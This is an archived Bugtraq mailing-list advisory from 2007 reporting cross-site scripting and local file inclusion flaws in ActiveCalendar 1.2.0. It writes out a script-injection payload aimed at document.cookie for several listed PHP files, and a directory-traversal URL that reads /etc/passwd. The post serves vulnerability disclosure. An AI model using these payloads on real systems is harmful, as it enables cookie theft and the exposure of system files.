lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070224023454.20638.qmail@securityfocus.com>
Date: 24 Feb 2007 02:34:54 -0000
From: simon.itsecurity@...il.com
To: bugtraq@...urityfocus.com
Subject: ActiveCalendar 1.2.0, Multiple vulnerabilities

ActiveCalendar 1.2.0, Multiple vulnerabilities
Vendor site : http://www.micronetwork.de/activecalendar/
Global risk : Critical

Multiples XSS :
---------------

/activecalendar/data/[page].php?css="><script>alert(document.cookie)</script>

In :

/data/
flatevents.php
js.php
mysqlevents.php
m_2.php
m_3.php
m_4.php
xmlevents.php
y_2.php
y_3.php


Local File Include :
---------------------

/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00


Regards,


Simon Bonnard - 24/02/07 - 02:40am
                                       

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ